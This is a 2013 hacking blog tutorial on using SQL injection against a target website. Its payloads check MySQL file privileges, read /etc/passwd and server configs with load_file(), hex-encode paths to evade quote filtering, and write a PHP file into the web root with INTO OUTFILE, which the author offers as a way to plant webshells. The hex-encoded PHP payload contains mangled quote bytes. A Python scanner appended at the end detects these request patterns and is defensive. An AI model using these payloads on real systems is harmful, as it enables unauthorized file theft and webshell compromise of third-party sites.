Monday, October 14, 2013

Local File Inclusion and Shell Writing using SQL Injection

First of all, hello to all readers of this article. Once again I am going to tell you about advanced SQL Injection. I am not going to cover the basic SQLi stuff, and I assume that you've already read my previous article about URL Based SQL Injection. If you haven't read it, please go to the following link:
This time I am going to tell you about reading (Local File Inclusion) and writing (PHP code writing) files through SQL Injection. First of all, in order to read or write files on the database server (which is usually also the web server, because in about 90% of cases the database and the web server run on the same computer), the database user must have the FILE privilege.
Let us assume the example of the previous article having the following URL: UNION ALL SELECT 1,2,3,4--

Now, assuming the vulnerable column is 3, we can check the current database user by injecting @@user or user() in place of 3: UNION ALL SELECT 1,2,user(),4--

If the user is root@localhost, then the chances of having file privileges are higher. If your target doesn't have 'root' as the user, don't lose heart; we still might have file privileges. To check the file privileges we can execute the following query: UNION ALL SELECT 1,2,file_priv,4 where username=user();--

If we get a 'Y' then we have file privileges and we can read or write files. But if it doesn't reply 'Y' we can still try by reading a file from the server. The file we should read first is '/etc/passwd', as it is usually readable by all users on Linux/Unix platforms. To read files from the server we will use the function load_file(): UNION ALL SELECT 1,2,load_file('/etc/passwd'),4--

Sometimes the apostrophe (') is blocked in the URL, so we can encode our file location as a hexadecimal literal like below: UNION ALL SELECT 1,2,load_file(0x2f6574632f706173737764),4--

NOTE: Don't forget to put '0x' before the hexadecimal code.
If we are able to read the passwd file, then we may try other configuration files for further exploitation, like httpd.conf.
In order to write files on the server we must note that if the apostrophe is blocked in the URL, then we cannot write a file on the server, as the file name requires the use of an apostrophe. Now that we know the apostrophe is required, let us assume that it is not blocked, so we can write the file. To write a file on the server we will be using "INTO OUTFILE" as below: UNION ALL SELECT 1,2,'Kyrion Hacking Tutorials',4 INTO OUTFILE '/tmp/pentest.txt'--

It is good practice to write files into the /tmp directory, as all users have write privileges there. We can read the file back from /tmp to confirm: UNION ALL SELECT 1,2,load_file('/tmp/pentest.txt'),4--

After confirming the file we've written, we can write a webshell on the target website after encoding the shell code into hexadecimal. Assuming that the web directory is "/var/www/html/" (which we can confirm after reading httpd.conf) and the code which we want to write into test.php is <?php echo "Kyrion Hacking Tutorials" ?>, the URL will be: UNION ALL SELECT 1,2,unhex(3c3f706870206563686f2020221c4b7972696f6e204861636b696e67205475746f7269616c7322201d203f3e),4 INTO OUTFILE '/var/www/html/test.php'--

As you might have noticed, the code which we are going to write must be encoded in hexadecimal, else it will not work. Now we can execute the code by just going to the URL:

This is how you can read and write files on a server using SQL Injection. Using the above method one can write malicious code, e.g. webshells, on a website through a SQL Injection vulnerability. I hope some of you will find this useful.
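As an added example from the detection side (not code from the original post), here is a small Python scanner over constructed access-log lines that decodes the hex literals the article relies on and flags load_file() / INTO OUTFILE requests; the log lines, paths and function names are constructed for illustration.

```python
import re
from typing import Optional
from urllib.parse import unquote_plus

# Constructed sample access-log lines (not from the original post). They reproduce
# the request shapes the article describes: load_file() with a quoted path, the same
# read with the path hex-encoded to dodge a quote filter, INTO OUTFILE to /tmp, and
# unhex() carrying "<?php" (3c3f706870) into a file write under the web root.
SAMPLE_LOG = """\
GET /news.php?id=5 HTTP/1.1
GET /news.php?id=-1+UNION+ALL+SELECT+1,2,load_file('/etc/passwd'),4-- HTTP/1.1
GET /news.php?id=-1+UNION+ALL+SELECT+1,2,load_file(0x2f6574632f706173737764),4-- HTTP/1.1
GET /news.php?id=-1+UNION+ALL+SELECT+1,2,'x',4+INTO+OUTFILE+'/tmp/pentest.txt'-- HTTP/1.1
GET /news.php?id=-1%20UNION%20ALL%20SELECT%201,2,unhex(3c3f706870),4%20INTO%20OUTFILE%20'/var/www/html/test.php'-- HTTP/1.1
"""

HEX_LITERAL = re.compile(r"0x([0-9a-f]{2,})|unhex\(\s*'?([0-9a-f]{2,})'?\s*\)", re.I)
FILE_OPS = re.compile(r"load_file\s*\(|into\s+(?:out|dump)file\b", re.I)
PATHS = re.compile(r"(?:load_file\s*\(\s*'?|(?:out|dump)file\s+')(/[^')\s]*)", re.I)

def decode_hex_literals(s: str) -> str:
    """Replace 0x... and unhex(...) literals with their decoded text, so a path or
    payload hidden from a quote filter becomes readable to the analyst."""
    def sub(m):
        try:
            return bytes.fromhex(m.group(1) or m.group(2)).decode("utf-8", "replace")
        except ValueError:  # odd-length or non-hex run: leave the literal alone
            return m.group(0)
    return HEX_LITERAL.sub(sub, s)

def analyze_request(line: str) -> Optional[dict]:
    """Return a finding for a request carrying a MySQL file read/write primitive,
    or None for a benign request."""
    parts = line.split()
    if len(parts) < 2:
        return None
    decoded = decode_hex_literals(unquote_plus(parts[1]))
    if not FILE_OPS.search(decoded):
        return None
    is_write = re.search(r"into\s+(?:out|dump)file", decoded, re.I) is not None
    return {
        "op": "write" if is_write else "read",
        "paths": PATHS.findall(decoded),
        "php_payload": "<?php" in decoded,  # a file write carrying code: webshell drop
    }

def scan_log(text: str) -> list:
    """Run analyze_request over every log line and keep the hits."""
    return [f for f in map(analyze_request, text.splitlines()) if f]
```

Findings with php_payload set are the webshell-drop case; on the database side, setting secure_file_priv and withholding the FILE privilege from the application account removes the primitive entirely.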
